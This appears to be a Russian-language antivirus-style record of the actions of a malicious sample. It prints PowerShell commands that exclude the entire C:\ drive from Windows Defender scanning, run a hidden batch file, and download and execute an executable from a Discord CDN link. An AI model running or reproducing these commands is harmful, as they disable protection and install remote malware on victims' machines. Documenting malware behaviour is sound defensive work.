Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath "'C:\'"
- %TEMP%\ixp000.tmp\resources.bat
- %TEMP%\ixp000.tmp\resources.bat
- '<SYSTEM32>\cmd.exe' /c "resources.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "resources.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "wget "https://cdn.discordapp.com/attachments/1150895038511976639/1158816810997657660/123.exe" -outfile "%APPDATA%\Вµ│ВїFi.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Invoke-Expression -Command "%APPDATA%\Вµ│ВїFi.exe"